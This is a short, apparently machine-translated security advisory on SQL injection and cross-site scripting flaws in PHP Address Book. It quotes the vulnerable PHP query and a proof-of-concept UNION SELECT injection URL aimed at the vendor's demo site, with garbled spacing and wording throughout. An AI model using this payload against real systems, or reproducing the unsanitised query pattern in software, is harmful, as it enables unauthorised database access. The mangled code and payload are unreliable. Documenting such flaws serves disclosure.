Multiple SQL injection and cross-site scripting vulnerabilities in PHP Address Book

Multiple SQL injection and cross-site scripting vulnerabilities in PHP Address Book

Release date:
Updated on:

Affected Systems:
PHP Address Book
Description:
Bugtraq id: 71862

PHP Address Book is a Web-based Address Book.

PHP Address Book has multiple SQL injection and Cross-Site Scripting Vulnerabilities. Attackers can exploit these vulnerabilities to steal cookie authentication creden。 and perform unauthorized database operations. Code with vulnerabilities:
If ($ id ){

$ SQL = "SELECT * FROM $ base_from_where AND $ table. id = '$ id '";
$ Result = mysql_query ($ SQL, $ db );
$ R = mysql_fetch_array ($ result );

$ Resultsnumber = mysql_numrows ($ result );
}

<* Source: Manish Tanwar

Link: http://packetstormsecurity.com/files/129789/phpaddressbook-sqlxss.txt
*>

Test method:

Alert

The following procedures (methods) may be offensive and are intended only for security research and teaching. Users are at your own risk!
POC
Http://php-addressbook.sourceforge.net/demo/view.php? Id = 1337 'Union select, version (), 6, database (), 10, 11, 12, 13, 16, 17, 18, 19, 20, 21, 24, 25, 26, 27, 28, 29, 30, 31, 32, 33, 34, 35, 36, 37, 38, 39, 40 -- +

Image link :-
Http://oi62.tinypic.com/2lncw3a.jpg

Suggestion:
Vendor patch:

PHP Address Book
----------------
Currently, the vendor does not provide patches or upgrade programs. We recommend that users who use the software follow the vendor's homepage to obtain the latest version:

Http://sourceforge.net/projects/php-addressbook/

This article permanently updates the link address: